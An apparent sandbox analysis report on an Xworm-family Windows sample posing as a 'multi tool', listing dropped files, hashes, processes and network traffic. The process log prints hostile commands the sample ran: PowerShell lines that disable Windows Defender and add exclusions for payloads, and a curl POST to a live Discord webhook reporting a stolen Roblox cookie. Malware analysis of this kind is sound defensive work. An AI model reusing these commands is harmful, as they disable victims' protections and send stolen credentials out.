Analysis Overview
SHA256
59529f95dc9a1b17af941ecf2543d611dbbf658a816966748d1959c88adf3512
Threat Level: Known bad
The file NEXUS MULTI TOOL COMEBACK.exe was found to be: Known bad.
Malicious Activity Summary
Xworm family
Xworm
Detect Xworm Payload
Command and Scripting Interpreter: PowerShell
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Looks up external IP address via web service
UPX packed file
Enumerates processes with tasklist
Enumerates physical storage devices
Unsigned PE
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Checks SCSI registry key(s)
Suspicious use of FindShellTrayWindow
Suspicious behavior: GetForegroundWindowSpam
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 15:37
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 15:37
Reported
2024-11-09 15:38
Platform
win7-20240903-en
Max time kernel
24s
Max time network
19s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | N/A | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe
"C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe"
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
"C:\Users\Admin\AppData\Roaming\ASFASFAF.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe"
C:\Users\Admin\AppData\Roaming\12usbb.exe
"C:\Users\Admin\AppData\Roaming\12usbb.exe"
C:\Users\Admin\AppData\Roaming\12usb.exe
"C:\Users\Admin\AppData\Roaming\12usb.exe"
C:\Users\Admin\AppData\Roaming\12b.exe
"C:\Users\Admin\AppData\Roaming\12b.exe"
C:\Users\Admin\AppData\Roaming\12a.exe
"C:\Users\Admin\AppData\Roaming\12a.exe"
C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat" "
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\where.exe
where curl
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
Files
memory/2756-0-0x000007FEF6403000-0x000007FEF6404000-memory.dmp
memory/2756-1-0x0000000000080000-0x0000000000A30000-memory.dmp
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
| MD5 | af18528c77f182540fda6cbbbf3a83ef |
| SHA1 | a99236fa135bfeba3dfeb7c700ee3b3856641213 |
| SHA256 | 3f471dc6372f5b012774fb7e3d22c45200368cf58e4e21f4274b0394edd97367 |
| SHA512 | cce7ac659ea137ffc2d2c125ee0b04c4910dfdeda79432eeaf91bb89f19f0a3006c2369b32a202bba56cf44d893a3426d3f23d7c3bf85292df694078f7cebf2c |
memory/2812-7-0x0000000000A00000-0x0000000000A16000-memory.dmp
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
| MD5 | 001f0331b217d54a4db2f5e1b724b465 |
| SHA1 | 75e3bf5ff0ce2fc0054cb60f546616434e847d15 |
| SHA256 | c696f10a59baf7856752071f854a082ffa1aaf41114a193e045aed22fd455511 |
| SHA512 | 893e9eac798dadc61564dfc3abefc0fbb0f681669efd06ac5b314d2a20c055a06049c7e7b8ec6d767254405c88794699761c2c6b4ad3adf80de5798a964d6afc |
memory/2812-13-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
memory/2932-14-0x0000000000180000-0x0000000000AD8000-memory.dmp
C:\Users\Admin\AppData\Roaming\12usbb.exe
| MD5 | f97be9836f9c32828bf064154ec2a827 |
| SHA1 | 04802f2c3962a6d19f97a288a836501477f43752 |
| SHA256 | 6c1fd1a9133f5922eb5c8a9051faf9021d0bfb8957bf38fceae3c663601cfc31 |
| SHA512 | 789e47895233ab3f502b2ea4df1598e6a71a997e52d932f34417e680a3e58e59ffc443b8b236055adb63f232bce38e58f3bb2981719de0bef31a4b4d461fbccc |
memory/2652-27-0x0000000000050000-0x0000000000068000-memory.dmp
C:\Users\Admin\AppData\Roaming\12usb.exe
| MD5 | 1a3dc739a65084d93c9a712ff05cc030 |
| SHA1 | 00c78706bb006a064b5aeadb3519b83b0e33fbdb |
| SHA256 | c678a8f61ccd104336e195e5021a798e85472f50eb36c69663fe06a4e666d4d3 |
| SHA512 | 2013594f81fce4539845a9deadf41fc624e96b787b2bdd0fd267f25fdd893661b5b1d44b7f888191a76bc4fc74f499b7cb139a195c18ab7f39cfb703db54a5a6 |
memory/2608-32-0x0000000000F10000-0x0000000000F2C000-memory.dmp
C:\Users\Admin\AppData\Roaming\12b.exe
| MD5 | ae771226292b612caa758e2e41914162 |
| SHA1 | 9b3ba9a6fcea6900f12c4fb83c3e1b2ef0223d35 |
| SHA256 | eed2208be3da34b0ec97617795da28f116142baee971818257b456b3ad8461bd |
| SHA512 | 380708c08299991e39230948d9bf73cdec3d5e737b8621ef58cf1f6143d349b0acf0af94779a3fcdd3ad6caff2483856368956ab1da6088d190104f122752dee |
memory/2216-34-0x00000000012B0000-0x00000000012CA000-memory.dmp
C:\Users\Admin\AppData\Roaming\12a.exe
| MD5 | 4e64f65f02f978039dc9f4876c2fdeb8 |
| SHA1 | 41645171376ebb64609b839abfb3a74a02cb76b3 |
| SHA256 | 9748db0c2c978baa0b06fe04f89095e946ee374971fbc9b02516fcdf89ebd84d |
| SHA512 | f2aa7eb3aa37a3bd036d912384a1b4c7e77e963cdee3bb1dfdcc70e852e75090e3344d83543b7971d7da3bd89096205cd13b91f38c1e3882f4f339e12b90d9a4 |
C:\Users\Admin\AppData\Roaming\12.exe
| MD5 | f6e8c50ec340112a5af6743fef26caf0 |
| SHA1 | 7f4b761c19a5c04b11f509d8d72cb4baed70851b |
| SHA256 | c1d3f338c8c1113b31487a7c1a9aa2bc7656031f117a77eaf95b78859a6d2a52 |
| SHA512 | c9fb14e0e6e14480577aeb1f3126c7a127fc579fa9ea00fb65c11f0ea3a5d762416ec35b0e5da0aafa8916204c82397a9ba5893b55ed49a94605a7f4310ebfb8 |
memory/2168-43-0x0000000000320000-0x000000000033C000-memory.dmp
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
| MD5 | 071ebbf91aaef883b9b251a11d0baaf0 |
| SHA1 | 24ecbab727858c1c20766774c018d10ee2f1362e |
| SHA256 | 558b5b9d5e3cbafe1b4691637755e9b1d89c0469de05385e1a23fe1ac25c9ad1 |
| SHA512 | b825edbbf1164395a210671641aa44420e217420b3ead7ab46cf7225b7a349209a91787f69630f39e8aca549e26d1449d88ea9b4f539400ca9d8f0edc79b2b7a |
memory/528-50-0x00000000009E0000-0x00000000009FA000-memory.dmp
memory/1436-49-0x0000000001110000-0x000000000113C000-memory.dmp
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
| MD5 | cf3cdbd223d377903322e1f993509d03 |
| SHA1 | c76e2c6001567498825e6d3a4741d5cb48f7eb4b |
| SHA256 | 93ebe1f8e297cba6476ac75133bd49a973126e5eddf17907e28f05da049d7f26 |
| SHA512 | 98a89d1ddb1250e5e7d1003ee095b58bbd6ebf6521d18670b4587373222640b2eb5b2c47731aae5d1100e3cc53ec7a76f1c9e50f9cb841659f4dbe4c365854da |
memory/2648-56-0x00000000012B0000-0x0000000001B38000-memory.dmp
C:\Users\Admin\AppData\Roaming\System User.exe
| MD5 | 6ca96db4e9ba4644886446eb96499093 |
| SHA1 | de67d2c3ce25a498ed6e4fe3a2c78b777da5a4c8 |
| SHA256 | c1567cafc453d946b3fa03e7ca8e7338cf353c8724d46b1e954aee245c1c32cf |
| SHA512 | 45de4658248aec9833fb97e18f5998b137b2a77c0d57b3e39aa952b5c17f1fc81b5ceacb39a5f6ab731e1156435605746933cd49b280c96af428f378de1bc886 |
C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat
| MD5 | a009efb7ec8161a79566214938b510b9 |
| SHA1 | 29615bff535c78d75e60c438d0e073393bb92169 |
| SHA256 | 8414c53566218e87e145cb41419c5c630885e8cb77bf8475268ad6dad409ce42 |
| SHA512 | b4c59ec289e8a77c5e7740602f80154c7455d1181c28da36f24db2da632012c4e2d39e213193523514db4839f49307630b11fd29833b181708c61b850ca1e1a6 |
C:\Users\Admin\AppData\Roaming\3.exe
| MD5 | e48808df8db78cbde11b3d92c0e6d3fa |
| SHA1 | b95c55735333b86ef43d12c4ff9f1f5c2b5eeda6 |
| SHA256 | 932c247dead183254ef8e17f7dfb028068b8ebfa5bad7a32b5c035855132e2fe |
| SHA512 | 3743bcb5853548265aa078a7526018ab084b8ff9d377d180e6c35cc1599c1e2f15088e4edf98d1ab77ed6d4aed28f1f1fa7d42a6c010dee7272227058909a7c8 |
memory/1572-85-0x0000000000FB0000-0x0000000000FDC000-memory.dmp
C:\Users\Admin\AppData\Roaming\4.exe
| MD5 | 223c162111dfc3bded4c899f2de073f5 |
| SHA1 | 098976f0ca4d17836a585ce26a16922e4bff7423 |
| SHA256 | 22bf2888b0a8ac7f3463540e8e0d7c33eed99397d86ef5ab3efddf7f911a2884 |
| SHA512 | a7b328233880c54d16ea89248d738c6fcca5d894694feb5ff416c94b4def3fd92f1c1a3b4513a06053105629584942e078ed3af7a611d0fc8944c9d71aad81cc |
C:\Users\Admin\AppData\Roaming\1.exe
| MD5 | c0e07ab470ece01eccc13e8baffc7244 |
| SHA1 | a554efbd2287bd5b3d1b826d1cd4353e794db346 |
| SHA256 | 3b217082d0487f8e5b07d7265984a93f673ddaba8e091ba85d192738efde0e1a |
| SHA512 | 3cc8dce7c4ce8154579cdc1c42d2afeefa3bbc684627e6f59de34428b09d03a181ef91e5e4f45308bce6b33391228985aa8eb1953ec84d6e29323c25c13a2a0c |
memory/2984-102-0x0000000000280000-0x00000000002AC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI27962\python313.dll
| MD5 | 6ef5d2f77064df6f2f47af7ee4d44f0f |
| SHA1 | 0003946454b107874aa31839d41edcda1c77b0af |
| SHA256 | ab7c640f044d2eb7f4f0a4dfe5e719dfd9e5fcd769943233f5cece436870e367 |
| SHA512 | 1662cc02635d63b8114b41d11ec30a2af4b0b60209196aac937c2a608588fee47c6e93163ea6bf958246c32759ac5c82a712ea3d690e796e2070ac0ff9104266 |
memory/2848-89-0x0000000000140000-0x0000000000168000-memory.dmp
memory/2088-117-0x000007FEF2F50000-0x000007FEF35B3000-memory.dmp
memory/2812-118-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
memory/2812-119-0x000007FEF6400000-0x000007FEF6DEC000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-09 15:37
Reported
2024-11-09 15:40
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
148s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
Xworm family
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ASFASFAF.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usbb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12usb.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12b.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12a.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\12.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\System User.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\1.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bound.exe | N/A |
Loads dropped DLL
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\system32\taskmgr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\system32\taskmgr.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\taskmgr.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskmgr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe
"C:\Users\Admin\AppData\Local\Temp\NEXUS MULTI TOOL COMEBACK.exe"
C:\Users\Admin\AppData\Roaming\ASFASFAF.exe
"C:\Users\Admin\AppData\Roaming\ASFASFAF.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.2.exe"
C:\Users\Admin\AppData\Roaming\12usbb.exe
"C:\Users\Admin\AppData\Roaming\12usbb.exe"
C:\Users\Admin\AppData\Roaming\12usb.exe
"C:\Users\Admin\AppData\Roaming\12usb.exe"
C:\Users\Admin\AppData\Roaming\12b.exe
"C:\Users\Admin\AppData\Roaming\12b.exe"
C:\Users\Admin\AppData\Roaming\12a.exe
"C:\Users\Admin\AppData\Roaming\12a.exe"
C:\Users\Admin\AppData\Roaming\12.exe
"C:\Users\Admin\AppData\Roaming\12.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe
"C:\Users\Admin\AppData\Roaming\NEXUS MULTI TOOL V1.1.exe"
C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe
"C:\Users\Admin\AppData\Roaming\AHAHAUSB KILLED.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat" "
C:\Users\Admin\AppData\Roaming\4.exe
"C:\Users\Admin\AppData\Roaming\4.exe"
C:\Users\Admin\AppData\Roaming\System User.exe
"C:\Users\Admin\AppData\Roaming\System User.exe"
C:\Users\Admin\AppData\Roaming\3.exe
"C:\Users\Admin\AppData\Roaming\3.exe"
C:\Users\Admin\AppData\Roaming\1.exe
"C:\Users\Admin\AppData\Roaming\1.exe"
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\where.exe
where curl
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\System User.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 404 -p 592 -ip 592
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /0
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Windows\system32\curl.exe
curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"@everyone @here Your Roblox Cookie is ready: 1234\"}" "https://discordapp.com/api/webhooks/1294585526804025436/ok3FvyE5NZ7ZDo4imAca_NqcAQYVuI-C6l2HJn4ILFCEdP9y9WgkKrCuwarM8seLpUDn"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-h6qso.in | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discordapp.com | udp |
| US | 162.159.130.233:443 | discordapp.com | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
